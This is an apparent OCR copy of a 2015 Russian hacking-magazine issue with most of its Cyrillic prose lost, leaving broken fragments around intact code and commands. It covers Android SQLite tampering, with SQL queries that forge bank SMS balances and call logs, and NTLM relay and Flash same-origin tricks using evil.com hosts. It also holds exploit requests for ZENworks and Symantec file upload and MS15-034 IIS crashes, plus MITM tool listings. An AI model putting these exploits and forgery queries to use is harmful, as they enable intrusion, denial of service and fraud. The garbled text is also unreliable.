@sh
uttersto
ck.com
.
SQLite,-Android.-db.,,.
root
06 /197/ 201544 X-Mobile
,Android-. /data/data/__/databases.- () PlayMarket.
/data/data,-,RootExplorer., ,,SQLiteDebugger(goo.gl/W4Euvp),DBBrowser for SQLite (sqlitebrowser.org). BusyBoxsqlite3.Nexus55.1. , -,- SQLite Debugger, App.-?.
accounts.db /data/system/ /data/system/users/0 - , . accounts.db account,-.,().
authtokens ,Google,GMS-.extras,GoogleUserId/.,Talk,YouTube,URLshortener,Wallet.
,,,-.. Nexus 5 - Nexus 7 ( 5.1 flash-all.bat -w, root). -,,accounts.db(WhatsApp,APK1mobile.com).,-/data/system/users/0.
,-Google ., ,,Google+,,GoogleDrive,-,.PlayMarket, : rpc:s-7:aec-7.,-.
-: Viber,
; Facebook,-
; WhatsApp; ICQ,
; Pebble
; Dropbox; ..
,,-.
:-,accounts.db.
mmssms.db -. /data/data/com.android.providers.telephony/databases/. --.- 900 . mmssms.db,:ECMC684402.05.1512:49 450 210009 KARI : 3281.16. ,.-SQLiteDebugger.-sms.:
> SELECT _id, thread_id, address, date, body FROM sms WHERE address = 900
- ,.-.-(,).
, SELECT -,,,,,UNIX time
accounts.db
accounts.db
BRADA
06 /197/ 2015 SQLite 45
(. mmssms.db).-. .Update value. . - .ECMC684405.05.1510:181000000ATM367700:1003731.16.-:
> UPDATE sms SET body = 'ECMC6844 05.05.15 10:18 1000000 ATM 367700 : 1003731.16' WHERE _id = 196
,- . (05.05.1510:18)date.UNIXtime-,-unixtimestamp(goo.gl/R1wv2a). 1430810300.date.
> UPDATE sms SET date = 1430810300000 WHERE _id = 196
, - . - Commit . , . mmssms.db , . -,,.
.-:threads,-()/, sms, ..1. .
sms - thread_id, -. mmssms.db, 7.,- . : thread_id/; address-; person ;date; read1 ,0; type1,2(04);body . , , :
-
mmssms.db
mmssms.db
06 /197/ 2015X-Mobile46
> INSERT INTO sms (thread_id, address, date, read, type, body) VALUES (7, 900, strftime ('%s', 'now')*1000, 1, 1, "_")
strftime('%s','now')*1000-.UNIXtime. .2. -
. +7123456789, ,- (.).,- threads canonical_addresses. canonical_addresses,.
> INSERT INTO canonical_addresses (address) SELECT '+7123456789' WHERE NOT EXISTS (SELECT 1 FROM canonical_addresses WHERE address = '+7123456789')
/ threads.recipient_ids-_id,canonical_addresses,.
> INSERT INTO threads (message_count, recipient_ids, read) SELECT 1, MAX(_id)+1, 0 from threads
thread_id,recipient_ids,-recipient_idsthreads1(MAX(_id)+1).
> INSERT INTO sms(thread_id, address, date, read, type, body) SELECT max(_id), "+7123456789", strftime('%s', 'now')*1000, 0, 1, '_' from threads
-..
,-.Proofofconcept:
VariableQuerry. :-
/,/-(1/2),.
-canonical_addresses..UNIXtime.-%Time0.
,.
-ScriptRunShellRoot:
$ system/xbin/sqlite3 /data/data/com.google. android.providers.telephony/databases/mmssms. db " INSERT INTO sms(thread_id, address, date, read, type, body) VALUES (7, 900, strftime('%s', 'now')*1000, 1, 1, "_")";
contacts2.db /data/data/com.android.providers.contacts/databases/.
,--.accounts (, facebook,vk, whatsapp, viber). , .
, - -. , . ()62015,10:23 0 0 (. contacts2.db).
calls , ( 364) , , -,.UNIXtime,-,2-.. (. ):
> UPDATE calls SET date = 1430829536000, duration = 1524 WHERE _id = 364
,.,,,SQLite-. telephony.db,,
,S-..-,(com.android.telephony).
barcode_scanner_history.db-BarcodeScanner/-(goo.gl/eWAiom).,---(com.google.zxing.client.android).
btopp.dbBluetooth,-MAC(com.android.bluetooth).
calendar.db(com.android.providers.calendar).
external.db internal.db,/sdcard,:system,data(com.android.providers.media).
google_analytics,GoogleAnalytics. keep.dbGoogleKeep.191,,
,Pebble,(com.google.android.keep).
mail.db.(ru.yandex.mail). music.db,/-GooglePlayMusic(
com.google.android.music). reminders.db,GoogleNow.
,GooglePlay(com.google.android.gms).
user_dict.db().-(com.android.providers.userdictionary).
viber_messages.db(com.viber.voip).
threads_db2.dbcontacts_db2.db Facebook(com.facebook.katana).
vk.db.,,.,,vk.com/idXXXX.,-(com.vkontakte.android).
06 /197/ 2015 SQLite 47
(. contacts2.db)- , ().-.-:
> INSERT INTO calls(number, date, duration, type) VALUES ("+71234567890", strftime('%s', 'now')*1000, 89, 1)
(.),. -
contacts2.db
-
06 /197/ 2015X-Mobile48
INFO
demosfenus SQL-
.
-
,. ( ),dialer.db.
,-,-, . .
msgstore.dbWhatsApp,/data/data/com.whatsapp/databases. chat_list -,threads-. messagesdata.wa.db. , WhatsApp .messagesSQL-:
> UPDATE messages SET data = "_" WHERE _id = ___
WhatsApp.,-.
settings.db/data/data/com.android.providers.settings-, . -.-, -. ,.:global,systemsecure.. adb_enabledUSB. airplane_mode_radios
,-.
always_finish_activities(activities),.
usb_mass_storage_enabledUSB-.
wifi_sleep_policyWi-Fi-().
wifi_watchdog_on/Wi-FiWatchdog().
bluetooth_discoverability_timeout-Bluetooth.
end_button_behavior,.
font_scale. setup_wizard_has_run
/-.
android_id ,64-(hex-),-.
location_mode skip_first_use_hints1,-
status_bar_show_battery_percent-.
audio_safe_volume_state-.
bugreport_in_power_menu-.
( API) developer.
android.com(goo.gl/WTsf9v).-settingscontent.-,(si -):
$ adb shell content insert --uri content: //settings/system --bind name:s:status_bar_ show_battery_percent --bind value:i:1
-c4.4+.(goo.gl/SH9zeP).,,1,0, .
, -/ . -lockscreen.password_typelock_pattern_autolock./data/system/locksettings.db.
,-. -, , , . - , , ,. / , -(5.0), , ,adbpull,,- 1520. - , , , -.
06 /197/ 2015 SQLite 49
. , -. ,, 3,74 (,Apple).
, , , Android(iOS)- . lowend Mediatek,,---.
Defy- . -, 1 , - (, , ), . Defy -Nexus4,,(1500- 2100 ). ,,,- NFC , -.
, - , , - .,Feedly, , . Defy-.,Android4.0/5.0, HTML .
, FeedMe, Java, -. ,- -,,.
-Android-,-.,-.MotorolaDefy,,-,,-iPhone.,--,,--,20082009.
OperaMini, , . OsmAnd(OpenStreetMap),-GhostCommander, --Twidere,.-,,-,.
GooGle Google, , ,,--.Google- , , .
- . - , .:GooglePlay,GmailGoogleKeep. , , , ? ,,?,-,,,-?.
, - gapps-pico, GooglePlayGoogleServicesFramework,- Google . - . - 1Mobile Market GooglePlay,Gmail,-Gmail (,,Inbox).
, --,., , - - Linux 2.4. KDE3, - - , KDE5,.,BeOS,- - . ,, . MeeGo Linux Nokia N900.,,,iOS. -, iPhone4, , -.,.
,:MotorolaDefy , - Motorola Droid II TI OMAP 3 1,2 (1),512-
,3,7-,-Android2.1. -,- - low low end. CyanogenMod 11 , (,Defy-,- kexec ). ,-DefyNexus4.,.
3,74.60, , -. -, ,-(Nexus4GalaxyNexus)-.
,- , ,,.
androidstreet.net
06 /197/ 2015X-Mobile50
APK #8.
AndroguArd Apktool (goo.gl/LdB4V7) / -, Androguard (goo.gl/bdBlRu) - . , Androguard Python-, - . Androapkinfo , androdd , androdiff , , androlyze DEX- . .
Androguard , - , , , - . , - , - - -, , VirusTotal, Google.
SmAlideASmalidea (goo.gl/EWmB1z) IDEA / Android Studio, - , smali. . backsmali (goo.gl/ikzOQS) APK-, - Android Studio, DEX .
smali, -, - , , ART, Dalvik Android 5.0. - smali- , Android- .
SimPlify , -. , - . , Simplify (goo.gl/ff0cNm) . Simplify , , - smali- , , , , , .
, Simplify - , - / .
, ! , . . , , . , : - , IDEA- smali- , Android- Sony Mobile. , , - .
APKAnAlyzer Apktool Angroguard , ApkAnalyzer (goo.gl/byFUq) Sony Mobile . Java- , -- . - APK-, smali-, (, ).
: /
; XML- -
; -
; logcat; ODEX ; ; (
ELF-).
, , , Java- JD-GUI (jd.benow.ca) APK Studio (apkstudio.codeplex.com), / APK- , Java-.
ApkAnalyzer
-
Smalidea
06 /197/ 2015 51
Easy Hack
GreenDog , Digital [email protected],twitter.com/antyurin
ViewState aSP.Net , Easy Hack - Microsoft. , ASP.NET. , - OWASP top 10 (SQLi, CSRF, XSS ) , , - .
ASP.NET ViewState. . - . - ASP.NET. , - . -
WARNING
- . ,
, -
.
06 /197/ 201552
postback. , ( URL), . ViewState. - . - ViewState , .
ViewState Base64 - , (__VIEWSTATE).
ViewState. -, reflected XSS. XSS Auditor - Base64, - ViewState . -, , -. , .
ViewState, Microsoft MAC (Message Authentication Code). , , . , - Base64 . ViewState - , , , , .
, . , MAC . - , MAC . -, . -, , . - , - -. -, - .
, MAC, Base64 . , , MAC , , .
Burp Proxy Response ViewState. (. ) , MAC.
ViewState
XXe JSON, - XXE - . XXE 2000-, ( Server Side Request Forgery). XXE - .
XXE , XML - Document Type Definition (DTD) - (inline DTD), -. , , , libxml,
(PHP, Python, Perl), inline DTD.
, , - , , - .
, NetSPI (goo.gl/ol9GAq), XXE.
, - (web service). , - -. . ( HTML), - .
- , - . - . . , , , , REST, SOAP, XML JSON. (endpoints) , (/webservice/json, /webservice/soap ).
NetSPI , - - , Content-Type. - endpoint JSON, Content-Type: application/xml, XML, , XXE. -, .
- XML, - . JSON :
{"search":"name","value":"netspitest"}
XML :
namenetspitest
- . , . Content-Type, XML
06 /197/ 2015 Easy Hack 53
proof of concept, . - C dummy, .
: , , . UAC , , , -.
, Windows. !
-, . -, - WebDAV SMB. , , - . , MS08-68 . , , , , , HTTP, SMB.
-, NTLM Relay , - SYSTEM , - . , , , .
Microsoft, , - -. SMB, - . , , .
wiNdOwS NtLM-
HttP SMB
, NTLM-. , - Microsoft, , . -.
. Windows NTLM, challenge-response:1. .2. (challenge).3. challenge ( NT-
, ) .4. .
, .
, - . relay-. , , .
, NTLMv2, , -, . , NTLM , HTTP, Telnet, POP3, FTP, SMB .
Windows. , -. SMB HTTP. UNC- (, \\evil\test), 445- (SMB) - , evil .
- SMB Relay. , . , , , RCE. MS08-68.
- . - NTLM- (goo.gl/AQbSNM).
.1. WebDAV ( HTTP)
NTLM. 1024, , .
2. ( NT AUTHORITY\SYSTEM) WebDAV (\\127.0.0.1:8080\test.txt).
3. , - .
4. .5. -! .
$IPC ( ).
WebDAV , SMB. WebDAV , - UNC- (\\127.0.0.1:8080\test.txt). - WebDAV Windows , (Windows 7, 8 8.1) , WebDAV. , - .
Windows Defender. SYSTEM. Windows, , , .
WebDAV ,
SYSTEM
Windows WebDAV
NTLM- ( NTLM). white paper (goo.gl/Q1Uz5A), - - .
NTLM- NTLM-. , , ,
06 /197/ 201554
SOP SwF FLeX SdK data="https://victim.com/badflex.swf ">
2. , victim.com .
3. , , victim.com, Flash, http://evil.com/sender.swf.
4. Flash , sender.swf, ( victim.com) evil.com, crossdomain.xml.
5. crossdomain.xml victim.com, - sender.swf.
6. sender.swf victim.com.7. sender.swf
victim.com . SOP , sender.swf victim.com.
, - , CSRF .
, , swf. ParrotNG, , Burp, SWF.
. UNC- SMB, HTTP. , - Intranet. , , - , . , http://evil/ Intranet, http://evil.com/ Internet. , - NTLM-, ( , , ). - NTLM-, , . IP- - Internet ( ).
. ( ), - , IE.
- , - HTTP. , man-in-the-middle . . , -.
. , - antivir.ru. antivir.ru NTLM-, , Internet. - http://evil/ .
. , - SMB. HTTP , NTLM.
:
HTTP/1.1 302 FoundContent-Type: text/htmlLocation: file://evil.com/ntlm_catcher
, - API, .
, , , , , . , , , MS . .
Flash crossdomain.xml, , - SOP (Same-origin policy). SOP Flash. Troopers 2015 Minded Security NibbleSec (goo.gl/JRBwJ4).
Troopers, . - SOP Flash? , Adobe , , - . , -, .
, , Flash , crossdomain.xml . . - .
Flex SDK, - Flash. 3.1 - (). . - flashvars (-, - ) resourceModuleURLs. , - , . . , - - , .
, Flash, Flex SDK , -, SDK -. -, Flex SDK, .
, , , , - Flex SDK, , 4.5.1. , , , . , - , - - , Google. , , Flex SDK.
. , victim.com, - (badflex.swf), - Flex SDK. evil.com - - (sender.swf), victim.com, crossdomain.xml - victim.com.1. evil.com, -
victim.com. - resourceModuleURLs. - :
Novell ZeNworks CVSSv2: N/A : 8 2015 : Pedro Ribeiro CVE: 2015-0779
Novell ZENworks Configuration Management (ZCM, ZENworks Suite). UploadServlet - uid (../). WAR- Tomcat -. WAR Web Archive Web Application Archive,
Java -. , . , - http.sys.
, , - - Java- JAR ZIP. WAR:
/index.html/guestbook.jsp/images/logo.png/WEB-INF/web.xml/WEB-INF/classes/org/wikipedia/Util.class/WEB-INF/classes/org/wikipedia/MainServlet.class/WEB-INF/lib/util.jar/META-INF/MANIFEST.MF
EXPLOIT : WAR-, :
dukeBarman [email protected],
@dukebarman, dukebarman.pro
06 /197/ 201556
POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
Metasploit.
msf exploit(zenworks_configuration_management_upload) > rexploit
ZCM. , ZDI-10-078/OSVDB-63412, .
TARGETSZENworks Configuration Management 0) agentName = filename.substring(24, index); else agentName = filename.substring(24); String date = mFormat.format(mParser.parse (filename.substring(0, 8))); String parentFolder = (new StringBuilder()). append(SisProperties.getBulkLogDir()).append(FILE_SEP). append(agentName).append(FILE_SEP).append(date).toString(); File parent = new File(parentFolder); if(!parent.isDirectory()) parent.delete(); parent.mkdirs(); file = new File(parentFolder, filename); return file; Throwable th; th; throw new IllegalArgumentException((new StringBuilder()). append("Corrupted bulk log filename [").append(filename). append("]!!").toString(), th);}...
, 24- . - filename . - (), :
06 /197/ 2015 57
LOG_ROOT/AGENT_NAME/FORMATTED_DATE
parent.mkdirs(). - .
EXPLOIT . , /register, GUID,
. YYYY-MM-DD/YYYYMMDD,
YYYYMMDD YYYY-MM-DD . , . - .
servlet : YYYYMMDD/../../../././././PATH_FROM_TOMCAT. - JSP-.
( , ) - (bit.ly/1IotJe3) . . - , :
...19991111est3X1999-11-11/19991111/
.4test5test6.jsp
:
...19991111/../../../././././tomcat/symapps/agent/sis-agent/jspshellS2.jsp
. -:
req1="""POST /sis-agent/"""+action+""" HTTP/1.1Host: """+host+"""Accept: */*Appfire-Format-Version: 1.0Content-Type: application/x-appfireAppFire-Charset: UTF-8AppFire-GUID: """+guid+"""Content-Length: """+str(len(body))+"""
action bulk-log; guid GUID ; str(len(body)) .
(Properties):
headers="Data-Format=text/plain\x0aData-Type=properties\x0aData-Length=%d\x0a\x0a" % (len(properties))
:
"file.name":__
JSP-
JSP-
:
headers="Data-Format=binary/zip\x0aData-Type=policy\x0aData-Length=%d\x0a\x0a" % (len(bin))
JSP- Metasploit. , jspshell.jsp. update.py.
, , . -, SCSP , - . - - .
- , (bit.ly/1IVLQan).
TARGETSSymantec Critical System Protection Server
IIS
Range Length
-
-
Range
HTTP-
HTTP-
TcpSegment
1. HTTP-
2.
Range
3. Range Tail
4.
5.
. .
, Range Length 284 0xFFFFFFFFFFFFFEE4. , .
HTTP- UlAdjustRangesToContentSize(). Range, . -, , Range - . -.
0xFFFFFFFFFFFFFFFF 0xFFFFFFFFFFFFFFFF >= >=
. - Range (. ).
284, 0xFFFFFFFFFFFFFEE4, . .
, -. , , UxpTpDirectTransmit(), . .
, :
Range Count = 1;Range Boundary and Range Info length = 0;Range Tail Boundary Length = 0;Range Length = 0xFFFFFEE4;HTTP Head Length = 283;
, 0xFFFFFFFF (4G). , . , - . 284 .
HTTP Response Length = HTTP Head Length + (Range End Position Range Start Position + 1)= HTTP Head Length + (0xFFFFFFFF Range Start Position + 1= HTTP Head Length - Range Start Position
Range Start Position HTTP , . , HTTP Response Length HTTP Head Length.
DoS, , HTTP Content Length . Range Start Position - HTTP Head Length + 1 . HTTP Content Length DoS-.
HTTP- , http.sys - . TcpSegmentTcbSend() tcpip.sys . (. ).
15 . HTTP Response Length 0xFFFFFFFF. Virtual address -
06 /197/ 2015 59
EXPLOIT ( ):
GET / HTTP/1.1Host: site.comRange: bytes=0-18446744073709551615
- : (bit.ly/1KvJDRc); Python (bit.ly/1cjO8mC).
:
curl -v SERVER_IP -H "Host: anything" -H"Range: bytes=0-18446744073709551615"
-, bash . , - :).
ITW- - . ( ESET):
GET /%7Bwelcome.png HTTP/1.1User-Agent: Wget/1.13.4 (linux-gnu)Accept: */*Host: [server-ip]Connection: Keep-AliveRange: bytes=18-18446744073709551615
TARGETSWindows- MS15-034.
SOLUTION .
7.
PHP
(>=0x80000000). HTTP Response Length - , . virtual address . partial memory descriptor list (MDL) (bit.ly/1zODcs4). , BSOD.
-.
GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3-18446744073709551615, 1-600"+ "\r\n\r\n"
(Range): Range1: 318 446 744 073 709 551 615; Range2: 1600.
UlpParseRange() :
Range1 Length = 0xFFFFFFFFFFFFFFFF - 0x3 + 1 = 0xFFFFFFFFFFFFFFFDRange2 Length = 600 -1 + 1 = 600
HTTP UlAdjustRangesToContentSize(). Range1 (3 + 0xFFFFFFFFFFFFFFFD => 0) , . Range2, , .
, - UxpTpDirectTransmit().
Range Count = 2Range1 Length = 0xFFFFFFFFFFFFFFFDRange2 Length = 600Http Head Length= 0x127 // HTTP head content, 1Range1 Boundary and Range1 Info length = 0x7aRange2 Boundary and Range2 Info length = 0x69Range Tail Boundary Length = 0x32; // 3
Range, (boundary) (Content-Type, Content-Range) Range ( 2).
HTTP- , :
HTTP Response Length = HTTP Head Length + Range Boundary and RangeInfo length + Range1 Length + Range Boundary Range Info length + Range2 Length = 0x127+7a+0xFFFFFFFD+0x69+0x258+0x32 => 0x491
- 0xFFFFFFFD. - 0x491 HTTP-. .
tcpip.sys . HTTP-. 0x491. , 0xFFFFFFFD ( 7). Length - Remain Length 0x2f0 (0x491 0x172 0x7a). : [0x3, 0x3 + 0x2f0]. - 0x2b6. .
, . - :
GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3- 18446744073709551615,1-32,32-64,64-96,96-128,128-256, 129-130,130-140,160-170,180-190, 190-200" + "\r\n\r\n"
- BSOD, - . - .
6. -
WARNING
-
. , -
, -
.
06 /197/ 201560
Tor:
@difezza, defec.ru
entavio@sh
uttersto
ck.com
,
06 /197/ 2015 61Tor:
,-,.- , ,, , ,,DreadPirateRoberts.
SilkRoad(20112013)Tor15,--.,200-.
2013 ,, -,.- .
- , -:,- . , , SilkRoad-.-, .
, , 400 onion- -,-SilkRoad2.0.
, -,-.,onion-,Tor , -, -.-,-.
2016 - (Nick Bilton), ,, . , - ,,-.Wired(www.wired.com/2015/04/silk-road-1), -.
Onymous, - (European Cybercrime Centre, EC3), , - (the U. S. Immigration and CustomsEnforcement,ICE),-(HomelandSecurityInvestigations,HSI)(Eurojust), 17, - ,410. : https://www.europol.europa.eu/content/global-action-against-dark-markets-tor-network.
Silk Road
onymouS
Silk Road
Onymous onion-
Tor, -
,
Silk Road
Silk Road.
Tor
?Tor?,,.,-,.,,-!?,.
06 /197/ 201562
, , -,,.
, - Tor -.-:().
, -? NSA ,Firefox,TorBrowser.,-NSA,-,-.
( , ?) , -,- . , , Flash , -.TorBrowser-,Flash-.
, -HTML5,-, , , - . WebRTC, -HTML5,Flash IP-.STUN-, WebRTC, - Tor -.TorBrowser.
Tor-,, , -,PoC., , ,-.
- , -NetFlow(www.cs.columbia.edu/~sc2516/papers/pam2014-tor-nfattack.pdf). -,- NetFlow- ,Tor . NetFlow- -: ; ; ; ; ; ; ; IP; TypeofService; TCP--
; ; .
,,-,
NSA -
Tor
Flash
IP-
Tor-
-NSA, - Tor-, -:
https://www.schneier.com/blog/archives/2013/10/how_the_nsa_att.html,
www.theguardian.com/world/interactive/2013/oct/04/egotistical-giraffe-nsa-tor-document.
nSa
WARNING
- - . , - , -
.
06 /197/ 2015 Tor: 63
Tor-.- -, . -Tor-,.
, -190,-Tor.-,.
Tor,,- , .exit--,,onion-.-onion-,HTTP/HTTPS- Tor-, -.
, HTTP-.-Referer,URL.- , --.
,-onion,.-,-,.
-,-.,.
,-,exit-,LeviathanSecurity.,-. - , Tor,-exit-nodeMITM--.
- , ( ) - , .
HTML5canvas,-JavaScript.-.-: (TorBrowser,-
);
-;
-.
,-, JavaScript- measu-reText().
,-TorBrowser,, . Tor Browser , --.
Tor-, , -
-
measureText() -
,
Tor
-
-
,
128
06 /197/ 201564
POST--, -,,.
? JS- -: Exit-node.MITM-,JS-
-,.
onion--,.,-.
XSS(,-)-.
. - 100 onion- ()falsepositive,,30%--.
, -, - . - , -JS--.,,c2c91d5b3c4fecd9109afe0esdfsdfsdfdrugs.onion(), gunsdfsdf.onion ( ),linkedin.com/vasya.:.
?-,onion-. , : JavaScript? , TorBrowser,JS.
, --.
- : - ( , - ), ( IT-). (ContentDeliveryNetwork,CDN),-128Tor-(CDN,).
, JavaScript,measureText()--.
-. -.
JavaScript,
fingerprint
-
, -
Tor Browser
,
Tor-
-
Tor-
, :
JavaScript -
? ,
Tor Browser,
JS
ONION ONION
ONION ONION
EXIT NODE EXIT NODE
= =
= =
XSS XSS
DOORWAY DOORWAY
INJECT INJECTWWW WWW
XSS XSS
06 /197/ 2015 Tor: 65
,-EMC-RSAConference2015,--CheckPoint.-,--,.-,:-,--.
RSA ConfeRenCe
IT-
2015
06 /197/ 201566
- , , , -
,. ,, . , - ? -???, 20 Moscone center,-, -RSA Conference 2015, -,--.
, - ,-.- -. - .-:, ( ,,-),,,.
,--. , -. - RSA, - ,,,, , ,,,-.
. Microsoft , , ,
,,,--,,-..
, , -.(-),-,, . - -.-,:-...
( !) (-).
- . - , Symantec TrendMicro Cisco Fortinet (-, - ), , , ,-.,,-.
(keynotes,,,, ),-. ( ), ( ) - --. -, (!),-.:,-,.
06 /197/ 2015 RSA Conference 2015 67
1.Dr.APT, ( Android), ( CAIQ,),-,.,-keynotes., -.
,-NFC (GoogleWalletApplePay)--,,:-.
:goo.gl/yf1TXL
,.62!- : 48% --,40%. , -(!). Improperly Validated SSL -,.,-, ,.
:goo.gl/ft1e3L
,2014,(-?:https://xakep.ru/2015/04/09/195-exploit-packs/), . MS Office ,CVE-2012-0158!
:goo.gl/1Nb6lN
-Yes,IaminRU, , . , (517) , .,,,() , - . (), ,,,-,-:,, , -.,-,.-, - BBS. ,BBS-, . (--),,-,65%814.
!
68 06/197/2015
SAPASE,? SQL/RPC- .-Java.
:goo.gl/b5eDZu
(https://xakep.ru/2014/09/08/password-manager-pentest/).,,(ZhiweiLi).-.,-.:CSRF(LastPass,RoboForm,NeedMyPassword)XSS(NeedMyPassword).
:goo.gl/H4TM2q
,
, will
hack for food
,
-
,
-
. ,
-
, , ,-.-IT-,:).
,-,RC2,RC4,RC5,.RSA.-,-.
, , RSA.
, - --,,.- .
. , - Windows, Microsoft. - - Microsoft Windows, SysinternalsProcessExplorerRootkitRevealer.,:https://xakep.ru/2009/05/12/48169/.
, Blowfish, -.SchneieronSecurity:DataandGoliath,-.
06 /197/ 2015 RSA Conference 2015 69
2. Moscone- . full pass, -, , , 2100 ,., ,-.(-).
.,,-. , ,--.
,-(!), . , :, . . -, . , ,,, 70% -.
IoT (Internet of Things) CCTV- -RomPager,-
INFO
- - Wi-Fi, . - , ,
Wireshark,
,
:).
-2012., , (https://xakep.ru/2012/12/30/kris-kasperski/), . , (,-,,,:).. .).
McAfee. , , ,McAfee,,,-:).
-.
!, (),-SpartanRifleLWRC,. -(),.
CheckPoint,-(;)),.,!
, 70%
06 /197/ 201570
, .
(POS) , . , - , PHP-,(), , .:,,.-,...
()-. . -:201337%,,201545%.-.5%,,-.,..-,.IT.
, . . ,,.
, ,,,,.
,( ). (top-ratedspeaker), . , . - SysinternalsTools, ,.-,2009-ProcessExplorer(,proofofconcept,).(- , - , , . , ).,--2012(blogs.technet.com/b/markrussinovich/archive/2012/01/05/3473797.aspx) RSA 2015-.-,,(), -.,ProcMon, ProcMon -,XML-,.-/.
.,-Kill,-. . ,.- suspend. , -.,--.Kill.,Windows10,,,.
, . ,, - . - , , -., , .
INFO
216
4.
-
,
,
Asus Eee
PC 1001px. -
-
... , -
windows XP!
, 2009 Process Explorer
. - , -, . , , , - . , . , , . , .
-, - - . , , , , , .
() - , -. - . - - - , .
(Active Directory, Lotus Domino, LDAP, Novell ).
(penetration testing) - . - , - , - . - , , , .
,
- , . . . , , - . - , - , 60 .
. - - , (, Active Directory). - -. - , . , , -, SNMP, RW. -, Oracle !
, .
. ,
white hat, , - -, ,
X@ygoltsev
Intro - , . , , , -, , . ( ) : , , . , - , . , Offensive Security -
06 /197/ 201572
, , - .
-, , . - - . , - Active Directory, , , - . , ( AES), , , - (j.mp/NCrOZU). , , - .
Active Directory, Windows.
- . , - .
WIndoWs Windows - Active Directory. - , , (, SMB Relay) (, mimikatz). , Domain Admins .
Windows.
- , - , . . , .
Web Proxy Auto dIscovery Internet Explorer. , , , - wpad.domain.name. . WPAD .
WPAD DNS, , , , .
NBNS WPAD.
, , http://wpad/wpad.dat.
, - -. wpad.domain.name, , , , WPAD NBNS . MITM , , ARP Poisoning.
Windows.
, - ( WPAD). Active Directory. -: User configuration Windows Settings Internet Explorer Maintenance Connection Automatic Browser Configuration Automatically detect configuration setting. .
/ , - , - , Hack.Tool. . .
Windows.
- -, - .
, . , , . , - , . . , . , , - - , - .
.
-. , - , . IP-, . , - .
-. .
Windows UNIx.
. - , . , - .
outro , , - , . - - , - . -, .
Vulnerability Assessment
(bit.ly/17lVCDU) Open Source Security Testing
Methodology Manual (bit.ly/U9WpQY) The Penetration Testing Execution
Standard (bit.ly/1KNe7iF)
PentesterLab (bit.ly/1uJ3RUu) Penetration Testing Practice Lab
(bit.ly/1fb61kO)
Open Penetration Testing Bookmarks
Collection (bit.ly/1vncteH)
, Active Directory (bit.ly/1cezrBb)
WPAD Man in the Middle (bit.ly/1InN9OL)
06 /197/ 2015 , 73
MITMf(goo.gl/LdxWWY) . - man-in-the-middle , sergio-proxy. Kali Linux. - (goo.gl/LdxWWY) :
# setup.sh# pip install -r requirements.txt
. : Spoof -
ARP/DHCP-, ICMP-;
Sniffer - ;
BeEFAutorun BeEF, ;
AppCachePoison ;
SessionHijacking - ;
BrowserProfiler ;
FilePwn HTTP - Backdoor Factory BDFProxy;
Inject HTML-; jskeylogger JavaScript- .
, , .
-. .
, - , . -
. -,
, MITM-.
MITM-
ant [email protected], @svv00p
Oleg Golovn
ev@
shuttersto
ck.com
ARP spoofing MITMf
WARNING
- - . , - , -
.
06 /197/ 201574
PuttyRider
PuttyRider
PuTTyRIdeR (goo.gl/xZpsbV) . , - -, -. , , - - Linux/UNIX-, SSH/Telnet/rlogin. - , . , PuTTY - . ( ), shell- . (). , - PuTTY, - (goo.gl/5MQdzW).
Sessionthief
sessIonThIef (goo.gl/VP51xA) , . . - ( - ) ARP poisoning. - , , , , Yahoo Facebook, SSL-, . , - , SSL, - . , Firefox - . - , :
# apt-get install build-essential libwxgtk2.8-dev libgtk2.0-dev libpcap-dev # g++ $(wx-config --cppflags --libs) -lpcap -o sessionthief *.cpp# setcap cap_net_raw,cap_net_admin=eip sessionthief
dsnIff(goo.gl/umyYJW)Dsniff , , - , , , : -/, . : arpspoof , ; dnsspoof arpspoof DNS-
DNS- ; dsniff (password sniffer), -
, Telnet, FTP, SMTP, POP (Post Office Protocol), IMAP (Internet Message Access Protocol), HTTP, CVS, Citrix, SMB (Server Message Block), Oracle ;
filesnarf tcpdump NFS-;
macof MAC- , , -, , dsniff ;
sshmitm SSH-, , .
. , . , -, -. Dsniff
06 /197/ 2015 75
MITMPRoxy(goo.gl/ISdbbM) , - HTTP-. /, -, , , -. , - . mitmproxy REST API, .
:
$ sudo aptitude install mitmproxy
$ pip install mitmproxy
$ easy_install mitmproxy
, mitmproxy HTTPS-, . , , - : goo.gl/FLcaiS.
Intercepter-NG
InTeRcePTeR-nG(goo.gl/r9n2jz) , . , ( - ) - . -, MITM, -, . - . -, , . -, - , , nix- - (, , Wine GUI). - MITM. . ARP poison. ( DNS/NBNS/LLMNR). DNS over ICMP Redirect, ICMP Redirect. DHCP MITM, SSL MITM + SSLStrip, WPAD, HTTP Injection, SSH-MITM. , - Windows , MITM (SSLStrip, SSL MITM, SMB hijack, LDAP relay, HTTP injection) . . , , .
Mitmproxy
PRoxyfuzz (goo.gl/C9B0AY) MITM- ProzyFuzz - . , - . , , - . TCP UDP. , . , -- ( ) PoC. :
python proxyfuzz -l -r -p [options]
: w ,
; c ( ); s ( ); u UDP- ( TCP).
The MIddleR(goo.gl/Gf3AlT) DEF CON - MITM- . - - HTTP : plugin-beef.py Browser Exploitation Framework (BeEF)
HTTP-, ; plugin-metasploit.py (HTTP)
IFRAME, Metasploit;
plugin-keylogger.py JavaScript onKeyPress , - HTTPS, , .
The Middler , - , . - - ( ), . : scapy, libpcap, readline, libdnet, python-netfilter. , , - .
06 /197/ 201576
eTTeRcaP(goo.gl/DF9xJ4) , - , MITM-. - , , - . - , - - . ][, : goo.gl/0CpUko.
Subterfuge
subTeRfuGe(goo.gl/0VKemE) Windows - MITM-, Intercepter-NG: , . , - Windows Linux MITM- (SSLStrip, SSL MITM, SMB hijack, LDAP relay, HTTP injection). nix- . MITM - (, Ettercap, Arpspoof, SSLStrip), . Subterfuge, , , DEF CON 20. , : SubterfugePublicBeta5.0.tar.gz. -
tar -zxvf /root/Desktop/SubterfugePublicBeta5.0.tar.gz -C/root/Desktopcd /root/Desktop/subterfugepython install.py
, . , -, subterfuge, - 127.0.0.1. Start , Subterfuge , . , Settings. , -: Session Hijacking: ,
-; HTTP code injection: -
; Evilgrade: Evilgrade -
.
KaRMa (goo.gl/mEIHc3) , - . , KARMA , , -, 802.11 Probe Request , / . Evil Twin, MITM. - , -, -, , . , , , -, , AP, - . : , , - ? , - , . -, , WiFi Pineapple Mark IV. KARMA -: Pwnie Express, Kali Linux, Snoopy, Jasager.
aIRJacK(goo.gl/TM9niF) , , ( , ) 802.11 . - . , , AirJack , ( DoS- MITM-), - SSID .
Ettercap
Lenovo. Superfish, - -. , SSL- - . , Superfish Inc. - Superfish : MITM;
